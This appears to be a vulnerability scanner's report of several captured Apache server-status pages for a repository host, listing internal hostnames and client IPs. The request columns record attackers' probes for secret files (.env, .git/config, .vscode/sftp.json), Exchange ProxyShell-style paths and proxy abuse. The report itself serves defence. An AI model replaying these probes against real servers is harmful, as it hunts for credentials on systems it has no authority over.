146.19.24.28http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-7584680/10/383_ 5.194360285523475500.00.3637040.10 185.242.226.88http/1.1 0-7584680/10/343_ 7.46225803941980.00.02347.42 87.246.7.66http/1.1 0-7584680/9/388_ 7.3443602221077510.065.7357350.24 185.242.226.88h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-7584680/17/372W 7.46001461490.00.7860.77 64.226.78.121http/1.1repo.nimoz.pl:443GET /server-status HTTP/1.1 0-7584680/24/382_ 7.4602328204270.08.801476.18 185.180.143.6http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-7584680/21/358_ 4.70010704424260.056.502565.33 185.242.226.88http/1.1 0-7584680/7/340_ 7.530226515920.060.83540.75 64.226.78.121http/1.1repo.nimoz.pl:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-7584680/14/363_ 7.530222453280.0184.16441.45 64.226.78.121http/1.1repo.nimoz.pl:443GET /debug/default/view?panel=config HTTP/1.1 0-7584680/7/392_ 7.5201748373550.00.052662.88 64.226.78.121http/1.1repo.nimoz.pl:443GET /about HTTP/1.1 0-7584680/10/601_ 7.5201713979210.00.047255.71 64.226.78.121http/1.1repo.nimoz.pl:443GET /.vscode/sftp.json HTTP/1.1 0-7584680/6/405_ 7.3204814979210.01.12133762.80 64.226.78.121h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-7584680/14/381_ 7.520262885470.062.19409.92 64.226.78.121http/1.1repo.nimoz.pl:443GET /server HTTP/1.1 0-7584680/7/342_ 7.340021830500.00.32115445.46 64.226.78.121http/1.1 0-7584680/14/333_ 7.45006833320.0122.3863974.40 64.226.78.121http/1.1 0-7584680/11/405_ 7.340025401050.00.532799.62 64.226.78.121http/1.1 1-7584690/5/137_ 2.1502782343250.00.521.82 64.226.78.121http/1.1 1-7584690/4/120_ 0.3702687121130.00.191.27 64.226.78.121h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-7584690/4/103_ 2.2510142830.00.014.34 64.226.78.121h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-7584690/9/171_ 0.8158132771390520.00.512.96 51.159.111.112http/1.1 1-7584690/10/1879_ 2.2758132562193410.00.2628258.88 64.225.54.88http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-7584690/3/129_ 0.3370155212854430.00.011.31 185.242.226.88http/1.1 1-7584690/10/114_ 2.237015422146840.00.971.90 185.242.226.88h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-7584690/10/117_ 2.14736699402560.064.2465.11 51.159.111.112http/1.1repo.nimoz.pl:443GET //core/js/dist/main.js?v=c03a1674-3 HTTP/1.1 1-7584690/2/109_ 0.327366263651850.00.01345.29 171.244.23.11http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01\x02 1-7584690/31/150_ 0.3610112503229550.00.542.57 159.65.51.227http/1.1 1-7584690/8/106_ 2.181011218439280.075.9276.73 159.65.51.227http/1.1 1-7584690/2/133_ 2.25101120623160.00.0159.51 159.65.51.227http/1.1vm-repo-prd.nimoz.local:80GET /files/ HTTP/1.1 1-7584690/2/133_ 0.351011223146140.00.002.24 159.65.51.227http/1.1 1-7584690/8/119_ 2.25101120213840.00.371.37 159.65.51.227http/1.1vm-repo-prd.nimoz.local:80GET /1.php HTTP/1.1 1-7584690/7/121_ 2.251011203595200.00.32345.76 159.65.51.227http/1.1vm-repo-prd.nimoz.local:80GET /password.php HTTP/1.1 1-7584690/1/94_ 1.261011214846363520.085.1486.14 159.65.51.227http/1.1 1-7584690/3/144_ 2.25101120271130.00.011.47 159.65.51.227http/1.1vm-repo-prd.nimoz.local:80GET /geoip/ HTTP/1.1 1-7584690/2/148_ 2.16101124038016230.00.01896.65 95.50.255.174h2repo.nimoz.pl:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-7584690/7/119_ 0.82101122789168300.00.471.45 95.50.255.174h2repo.nimoz.pl:443done, streams: 0/6/6/0/0 (open/recv/resp/push/rst) 1-7584690/5/111_ 0.7510112534135570.00.311.22 159.65.51.227http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-7584690/5/144_ 2.1604974776940.00.03426.67 159.65.51.227http/1.1 1-7584690/7/163_ 2.250041323260.00.482037.88 159.65.51.227http/1.1vm-repo-prd.nimoz.local:80GET /form.html HTTP/1.1 1-7584690/11/125_ 2.30020120450.00.061.13 64.226.78.121http/1.1repo.nimoz.pl:443GET /v2/_catalog HTTP/1.1 1-7584690/2/231_ 0.7501115822013990.065.552891.14 95.50.255.174h2repo.nimoz.pl:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-7584690/4/137_ 2.30019816370.00.0480.97 64.226.78.121http/1.1repo.nimoz.pl:443GET / HTTP/1.1 2-73-0/0/526. 0.00145373017783130.00.00898.28 185.242.226.88http/1.1 2-73-0/0/507. 0.00145373117597930.00.002156.11 185.242.226.88http/1.1 2-73-0/0/391. 0.0014537303997720.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe448829e9747
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Thursday, 21-Mar-2024 11:10:51 CET Restart Time: Friday, 26-Jan-2024 09:06:02 CET Parent Server Config. Generation: 56 Parent Server MPM Generation: 55 Server uptime: 55 days 2 hours 4 minutes 48 seconds Server load: 0.00 0.00 0.00 Total accesses: 22801 - Total Traffic: 662.6 GB - Total Duration: 100964135 CPU Usage: u26.41 s62.26 cu758.51 cs608.43 - .0306% CPU load .00479 requests/sec - 146.0 kB/second - 29.8 MB/request - 4428.06 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 29481no0yes124000 39482no0yes025000 Sum200 149000 ..................................................______________ ________W___________________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-54-0/0/202. 0.00402440346060.00.001.82 3.238.234.3http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-54-0/0/225. 0.004024431858340.00.002.52 157.245.176.88http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 0-54-0/0/255. 0.00402442278047280.00.00132864.67 185.242.226.70http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-54-0/0/1256. 0.00402440189283200.00.0024803.46 3.238.234.3http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-54-0/0/225. 0.004024408217810.00.001373.37 157.245.176.88http/1.1vm-repo-prd.nimoz.local:80GET /form.html HTTP/1.1 0-54-0/0/239. 0.00402441841138110.00.002230.75 3.238.234.3http/1.1repo.nimoz.pl:443POST / HTTP/1.1 0-54-0/0/200. 0.0040244235287370.00.0034590.89 3.238.234.3http/1.1repo.nimoz.pl:443GET /_profiler/phpinfo HTTP/1.1 0-54-0/0/293. 0.0040244031742170.00.003017.41 104.152.52.109http/1.1 0-54-0/0/251. 0.00402440635900.00.001.58 104.152.52.109http/1.1 0-54-0/0/248. 0.004024404686420.00.00362.93 104.152.52.109h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-54-0/0/260. 0.00402442723256110.00.0037038.28 159.203.224.34http/1.1repo.nimoz.pl:443GET /autodiscover/autodiscover.json?@zdi/Powershell HTTP/1.1 0-54-0/0/215. 0.004024403899040.00.00346.30 146.19.24.28http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-54-0/0/260. 0.0040244020767400.00.0057283.48 104.152.52.109h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-54-0/0/249. 0.0040244281222880.00.0059.20 87.120.84.69http/1.1repo.nimoz.pl:443GET /.git/config HTTP/1.1 0-54-0/0/236. 0.0040244028066520.00.001466.38 157.245.176.88http/1.1vm-repo-prd.nimoz.local:80GET /password.php HTTP/1.1 0-54-0/0/218. 0.00402440974970.00.0065.81 157.245.176.88http/1.1 0-54-0/0/208. 0.004024406241300.00.00478.94 185.224.128.43http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-54-0/0/203. 0.0040244231795770.00.00255.68 85.90.246.159http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 0-54-0/0/279. 0.00402442348330360.00.002661.73 157.245.176.88http/1.1 0-54-0/0/482. 0.00402442413917330.00.007254.72 157.245.176.88http/1.1 0-54-0/0/257. 0.0040244014886930.00.00133760.03 157.245.176.88http/1.1vm-repo-prd.nimoz.local:80GET /files/ HTTP/1.1 0-54-0/0/243. 0.004024402550250.00.00346.65 45.79.144.238http/1.1 0-54-0/0/217. 0.0040244018499970.00.00112514.63 157.245.176.88http/1.1vm-repo-prd.nimoz.local:80GET /geoip/ HTTP/1.1 0-54-0/0/186. 0.004024406244510.00.0063850.97 185.180.143.8http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-54-0/0/276. 0.0040244025264010.00.002797.94 157.245.176.88http/1.1vm-repo-prd.nimoz.local:80GET /upl.php HTTP/1.1 1-54-0/0/70. 0.00402440124420.00.000.59 3.238.234.3http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-54-0/0/49. 0.0040244040070.00.000.29 157.245.176.88http/1.1 1-54-0/0/45. 0.0040244097570.00.003.25 157.245.176.88http/1.1vm-repo-prd.nimoz.local:80GET /info.php HTTP/1.1 1-54-0/0/106. 0.00402440228330.00.001.76 157.245.176.88http/1.1 1-54-0/0/1809. 0.0040244062096080.00.0028257.82 157.245.176.88http/1.1vm-repo-prd.nimoz.local:80GET /systembc/password.php HTTP/1.1 1-54-0/0/67. 0.004024402821750.00.000.64 157.245.176.88http/1.1 1-54-0/0/52. 0.0040244071600.00.000.29 157.245.176.88http/1.1vm-repo-prd.nimoz.local:80GET /bundle.js HTTP/1.1 1-54-0/0/47. 0.0040244027340.00.000.19 157.245.176.88http/1.1 1-54-0/0/50. 0.004024403635100.00.00344.58 157.245.176.88http/1.1vm-repo-prd.nimoz.local:80GET /favicon.ico HTTP/1.1 1-54-0/0/59. 0.00402440192360.00.000.91 151.106.27.60http/1.1vm-repo-prd.nimoz.local:80GET /actions-server/.env HTTP/1.1 1-54-0/0/44. 0.0040244035710.00.000.20 151.106.27.60http/1.1 1-54-0/0/39. 0.004024422578280.00.0058.11 157.245.176.88http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-54-0/0/73. 0.00402440130860.00.001.46 195.170.172.128http/1.1vm-repo-prd.nimoz.local:80GET /download/file.ext HTTP/1.1 1-54-0/0/50. 0.0040244056560.00.000.22 157.245.176.88http/1.1 1-54-0/0/54. 0.0040244273521820.00.00344.69 157.245.176.88http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-54-0/0/46. 0.0040244046720.00.000.24 157.245.176.88http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-54-0/0/65. 0.004024420255030.00.000.36 195.170.172.128http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-54-0/0/79. 0.004024407969020.00.00895.50 151.106.27.60http/1.1vm-repo-prd.nimoz.local:80GET /cryo_project/.env HTTP/1.1 1-54-0/0/50. 0.0040244040890.00.000.23 157.245.176.88http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-54-0/0/49. 0.0040244062680.00.000.32 104.152.52.109http/1.1 1-54-0/0/73. 0.004024404704100.00.00425.32 104.152.52.109h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-54-0/0/103. 0.00402442241245790.00.002036.76 185.180.143.8http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-54-0/0/50. 0.00402443339280.00.000.25 185.180.143.190http/1.1repo.nimoz.pl:443GET /js/NewWindow_2_all.js HTTP/1.1 1-54-0/0/174. 0.00402442321772580.00.002824.95 3.238.234.3http/1.1repo.nimoz.pl:443POST / HTTP/1.1 1-54-0/0/75. 0.004024431764160.00.0080.28 185.180.143.48http/1.1repo.nimoz.pl:443GET / HTTP/1.1 2-5594810/2/435_ 0.5233622717732630.00.02897.89 141.98.11.96http/1.1 2-5594810/2/411_ 1.0752617563110.00.012155.76 172.105.16.117http/1.1repo.nimoz.pl:443GET / HTTP/1.1 2-5594810/0/292_ 0.00503902460.0<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe4486aed401b
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Friday, 08-Mar-2024 05:32:21 CET Restart Time: Friday, 26-Jan-2024 09:06:02 CET Parent Server Config. Generation: 43 Parent Server MPM Generation: 42 Server uptime: 41 days 20 hours 26 minutes 19 seconds Server load: 0.00 0.00 0.00 Total accesses: 17202 - Total Traffic: 635.0 GB - Total Duration: 94431279 CPU Usage: u19.42 s46.33 cu661.98 cs546.17 - .0352% CPU load .00476 requests/sec - 184.1 kB/second - 37.8 MB/request - 5489.55 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 016795no0yes124000 116796no0yes025000 Sum200 149000 _______________________W__________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-42167950/0/127_ 0.00124240630.00.001.43 134.209.25.199http/1.1 0-42167950/1/150_ 0.06126788200.00.021.85 134.209.25.199http/1.1 0-42167950/0/180_ 0.0012377982690.00.00132864.50 134.209.25.199http/1.1 0-42167950/1/1132_ 0.0110189164110.00.0024802.50 134.209.25.199h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-42167950/2/142_ 0.20108124260.00.001372.70 134.209.25.199h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-42167950/0/146_ 0.000041043870.00.002230.51 64.62.197.206http/1.1 0-42167950/1/104_ 0.03005226640.00.0034590.13 64.62.197.204h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-42167950/0/207_ 0.001517031662980.00.003017.16 172.104.208.178http/1.1vm-repo-prd.nimoz.local:80HELP 0-42167950/2/184_ 0.26128228583540.00.031.48 185.180.143.189http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-42167950/1/173_ 0.041281264630650.00.01362.27 162.243.149.18http/1.1repo.nimoz.pl:443GET /login HTTP/1.1 0-42167950/2/193_ 0.3502723209470.00.0137038.10 134.209.25.199http/1.1repo.nimoz.pl:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-42167950/2/121_ 0.271252263833800.00.03346.06 185.180.143.189http/1.1repo.nimoz.pl:443GET /ext-js/app/common/zld_product_spec.js HTTP/1.1 0-42167950/1/190_ 0.041252020697540.00.0057283.34 146.19.24.28http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-42167950/3/166_ 0.231321156770.00.0358.98 134.209.25.199h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-42167950/0/157_ 0.000028012260.00.001466.24 134.209.25.199http/1.1 0-42167950/4/136_ 0.35024887600.00.0559.58 134.209.25.199http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-42167950/0/125_ 0.00006179870.00.00478.74 64.62.197.211h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-42167950/1/124_ 0.19858301721500.00.01255.48 198.235.24.122http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 0-42167950/2/198_ 0.3502348146680.00.012661.55 134.209.25.199http/1.1repo.nimoz.pl:443GET /.vscode/sftp.json HTTP/1.1 0-42167950/0/398_ 0.00856013867380.00.007254.51 172.104.208.178http/1.1vm-repo-prd.nimoz.local:80\xbd\xff\x9e\xffE\xff\x9e\xff\xbd\xff\x9e\xff\xa4\xff\x86\xff\xc4\xff\xbe\xff\xc7\xff\xdb\xff\xee\xffx\\d9\xff\xed\xff\xa4\xff\x9d\xff\xcf\xff\xd8\xff\xe5\xff\x04\xff\x12\xff0\xff\xb1\xff\xbd\xff\xe7\xff\xe2\xff\xdd\xff\xdc\xff\xde\xff 0-42167950/2/166_ 0.2712714738400.00.03133759.36 134.209.25.199http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-42167950/2/129_ 0.350222477030.00.01345.92 134.209.25.199http/1.1repo.nimoz.pl:443GET /about HTTP/1.1 0-42167950/0/131_ 0.001018411770.00.00112514.45 172.104.208.178http/1.1 0-42167950/0/109W 0.00005735910.00.0063850.69 134.209.25.199http/1.1repo.nimoz.pl:443GET /server-status HTTP/1.1 0-42167950/2/184_ 0.3502225196370.00.012797.75 134.209.25.199http/1.1repo.nimoz.pl:443GET /debug/default/view?panel=config HTTP/1.1 1-42167960/1/62_ 0.0110109330.00.010.32 134.209.25.199h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-42167960/0/36_ 0.001029660.00.000.18 134.209.25.199h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-42167960/1/35_ 0.010061290.00.000.16 134.209.25.199http/1.1 1-42167960/1/66_ 0.08026162630.00.010.92 134.209.25.199http/1.1repo.nimoz.pl:443GET /server HTTP/1.1 1-42167960/0/40_ 0.00191030107670.00.000.42 35.203.211.76http/1.1 1-42167960/0/53_ 0.00152102812930.00.000.60 164.52.0.93http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-42167960/1/36_ 0.041517052290.00.000.23 185.180.143.48http/1.1vm-repo-prd.nimoz.local:80GET /ext-js/app/common/zld_product_spec.js HTTP/1.1 1-42167960/0/38_ 0.0019103026430.00.000.15 35.203.211.76http/1.1 1-42167960/0/36_ 0.001910403585950.00.00344.49 35.203.211.76http/1.1 1-42167960/0/42_ 0.0019540099190.00.000.36 172.104.208.178http/1.1 1-42167960/0/34_ 0.00191032634550.00.000.14 35.203.211.76http/1.1 1-42167960/0/31_ 0.0015120561520.00.0057.60 212.102.40.218http/1.1 1-42167960/0/61_ 0.0085702894870.00.001.39 64.62.197.211h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-42167960/0/39_ 0.008569054880.00.000.14 64.62.197.208http/1.1 1-42167960/0/38_ 0.001910303478770.00.00344.61 35.203.211.76http/1.1 1-42167960/0/36_ 0.0019543038500.00.000.16 172.104.208.178http/1.1 1-42167960/0/50_ 0.0015120234320.00.000.27 173.255.250.5h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-42167960/0/70_ 0.0085707954260.00.00894.98 198.235.24.122http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-42167960/0/36_ 0.00857014190.00.000.16 185.242.226.10http/1.1 1-42167960/1/39_ 0.0415212761590.00.020.25 185.180.143.48http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-42167960/2/59_ 0.080224682070.00.01425.25 134.209.25.199http/1.1repo.nimoz.pl:443GET /v2/_catalog HTTP/1.1 1-42167960/0/91_ 0.0019542041195150.00.002036.68 172.104.208.178http/1.1 1-42167960/0/36_ 0.00856130010.00.000.16 185.242.226.10http/1.1repo.nimoz.pl:443GET /core/img/favicon.ico HTTP/1.1 1-42167960/0/164_ 0.0019103021733250.00.002824.89 35.203.211.76http/1.1 1-42167960/0/56_ 0.0000568690.00.0071.36 164.52.0.93h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-41-0/0/394. 0.0019937017730100.00.00897.70 185.36.81.40http/1.1vm-repo-prd.nimoz.local:80CONNECT google.com:443 HTTP/1.1 2-41-0/0/380. 0.0019937017561150.00.002155.64 172.105.158.200http/1.1vm-repo-prd.nimoz.local:80G
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe448a3dfec60
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Thursday, 07-Mar-2024 18:11:14 CET Restart Time: Friday, 26-Jan-2024 09:06:02 CET Parent Server Config. Generation: 42 Parent Server MPM Generation: 41 Server uptime: 41 days 9 hours 5 minutes 11 seconds Server load: 0.00 0.00 0.00 Total accesses: 16912 - Total Traffic: 635.0 GB - Total Duration: 94425547 CPU Usage: u19.7 s45.77 cu660.74 cs546.06 - .0356% CPU load .00473 requests/sec - 186.2 kB/second - 38.4 MB/request - 5583.35 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 213678no0yes124000 313679no0yes025000 Sum200 149000 ..................................................______________ __________W_________________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-38-0/0/127. 0.0023826824240630.00.001.43 74.101.125.2http/1.1 0-38-0/0/149. 0.002382680787930.00.001.83 95.130.62.147http/1.1vm-repo-prd.nimoz.local:80done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-38-0/0/180. 0.002382682377982690.00.00132864.50 79.110.62.197http/1.1 0-38-0/0/1131. 0.002382680189164110.00.0024802.50 185.191.126.213http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-38-0/0/140. 0.0023826808124240.00.001372.69 164.52.0.93http/1.1 0-38-0/0/146. 0.00238268041043870.00.002230.51 212.102.40.218http/1.1 0-38-0/0/103. 0.0023826805226630.00.0034590.13 164.52.0.93http/1.1 0-38-0/0/207. 0.00238268031662980.00.003017.16 185.172.32.7http/1.1 0-38-0/0/182. 0.0023826832582940.00.001.45 185.242.226.10http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-38-0/0/172. 0.0023826804630390.00.00362.26 185.242.226.10http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-38-0/0/191. 0.00238268023209190.00.0037038.09 185.191.126.213http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-38-0/0/119. 0.0023826803833270.00.00346.02 185.242.226.10http/1.1vm-repo-prd.nimoz.local:80GET /core/img/favicon.ico HTTP/1.1 0-38-0/0/189. 0.002382682820697540.00.0057283.34 65.75.195.25http/1.1repo.nimoz.pl:443GET /dns-query?dns=AAABAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB 0-38-0/0/163. 0.0023826801156220.00.0058.94 164.52.0.93h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-38-0/0/157. 0.00238268028012260.00.001466.24 95.130.62.147http/1.1 0-38-0/0/132. 0.002382680886770.00.0059.53 185.191.126.213http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-38-0/0/125. 0.0023826806179870.00.00478.74 146.19.24.28http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-38-0/0/123. 0.0023826801721190.00.00255.47 165.84.142.83http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-38-0/0/196. 0.00238268048146440.00.002661.54 185.242.226.10http/1.1 0-38-0/0/398. 0.00238268013867380.00.007254.51 185.242.226.10http/1.1 0-38-0/0/164. 0.00238268014737870.00.00133759.34 74.101.125.2http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-38-0/0/127. 0.0023826802476800.00.00345.91 213.134.162.80h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-38-0/0/131. 0.00238268018411770.00.00112514.45 107.170.208.38http/1.1vm-repo-prd.nimoz.local:80MGLNDD_148.81.110.91_80\n 0-38-0/0/109. 0.0023826805735910.00.0063850.69 185.172.32.7http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-38-0/0/182. 0.00238268025196150.00.002797.74 172.104.238.162http/1.1 1-38-0/0/61. 0.0023826825109320.00.000.31 164.52.0.93http/1.1 1-38-0/0/36. 0.00238268029660.00.000.18 164.52.0.93h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-38-0/0/34. 0.00238268061290.00.000.16 164.52.0.93h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-38-0/0/65. 0.002382680162370.00.000.91 152.32.249.95http/1.1repo.nimoz.pl:443GET /robots.txt HTTP/1.1 1-38-0/0/40. 0.002382680107670.00.000.42 152.32.249.95http/1.1vm-repo-prd.nimoz.local:80GET /core/img/favicon.ico HTTP/1.1 1-38-0/0/53. 0.0023826802812930.00.000.60 164.52.0.93http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-38-0/0/35. 0.00238268052290.00.000.23 173.255.250.5http/1.1vm-repo-prd.nimoz.local:80GET /db/phpmyadmin4/index.php?lang=en HTTP/1.1 1-38-0/0/38. 0.00238268026430.00.000.15 152.32.249.95http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-38-0/0/36. 0.0023826803585950.00.00344.49 164.52.0.93http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-38-0/0/42. 0.00238268099190.00.000.36 159.223.212.224http/1.1 1-38-0/0/34. 0.002382682634550.00.000.14 185.180.143.136http/1.1repo.nimoz.pl:443GET /cgi-bin/authLogin.cgi HTTP/1.1 1-38-0/0/31. 0.002382680561520.00.0057.60 212.102.40.218http/1.1 1-38-0/0/61. 0.002382682894870.00.001.39 212.102.40.218h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-38-0/0/39. 0.00238268054880.00.000.14 64.62.197.190h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-38-0/0/38. 0.0023826803478770.00.00344.61 104.250.50.118http/1.1 1-38-0/0/36. 0.00238268038500.00.000.16 162.243.139.35h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-38-0/0/50. 0.002382680234320.00.000.27 173.255.250.5h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-38-0/0/70. 0.0023826807954260.00.00894.98 185.242.226.10http/1.1 1-38-0/0/36. 0.00238268014190.00.000.16 185.242.226.10http/1.1 1-38-0/0/38. 0.00238268061320.00.000.23 185.242.226.10http/1.1repo.nimoz.pl:443GET /core/img/favicon-touch.png HTTP/1.1 1-38-0/0/57. 0.0023826804681850.00.00425.24 185.242.226.10http/1.1vm-repo-prd.nimoz.local:80GET /core/img/favicon-touch.png HTTP/1.1 1-38-0/0/91. 0.00238268041195150.00.002036.68 185.242.226.10http/1.1 1-38-0/0/36. 0.00238268130010.00.000.16 185.242.226.10http/1.1repo.nimoz.pl:443GET /core/img/favicon.ico HTTP/1.1 1-38-0/0/164. 0.00238268021733250.00.002824.89 165.84.142.83http/1.1 1-38-0/0/56. 0.002382680568690.00.0071.36 164.52.0.93h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-41136780/1/388_ 0.553017730090.00.00897.70 134.122.34.144h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-41136780/5/374_ 0.3132517561150.00.022155.63 134.122.34.144http/1.1 2-41136780/3/255_ 0.732253898760.00.01268.01 134.122.34.144http/
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe448b9d9ba4e
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Wednesday, 06-Mar-2024 20:43:31 CET Restart Time: Friday, 26-Jan-2024 09:06:02 CET Parent Server Config. Generation: 41 Parent Server MPM Generation: 40 Server uptime: 40 days 11 hours 37 minutes 28 seconds Server load: 0.00 0.00 0.00 Total accesses: 16805 - Total Traffic: 635.0 GB - Total Duration: 94424553 CPU Usage: u19.73 s44.84 cu659.33 cs545.92 - .0363% CPU load .0048 requests/sec - 190.4 kB/second - 38.7 MB/request - 5618.84 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 210672no0yes124000 310673no0yes025000 Sum200 149000 ..................................................______________ ___W________________________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-38-0/0/127. 0.0016100524240630.00.001.43 74.101.125.2http/1.1 0-38-0/0/149. 0.001610050787930.00.001.83 95.130.62.147http/1.1vm-repo-prd.nimoz.local:80done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-38-0/0/180. 0.001610052377982690.00.00132864.50 79.110.62.197http/1.1 0-38-0/0/1131. 0.001610050189164110.00.0024802.50 185.191.126.213http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-38-0/0/140. 0.0016100508124240.00.001372.69 164.52.0.93http/1.1 0-38-0/0/146. 0.00161005041043870.00.002230.51 212.102.40.218http/1.1 0-38-0/0/103. 0.0016100505226630.00.0034590.13 164.52.0.93http/1.1 0-38-0/0/207. 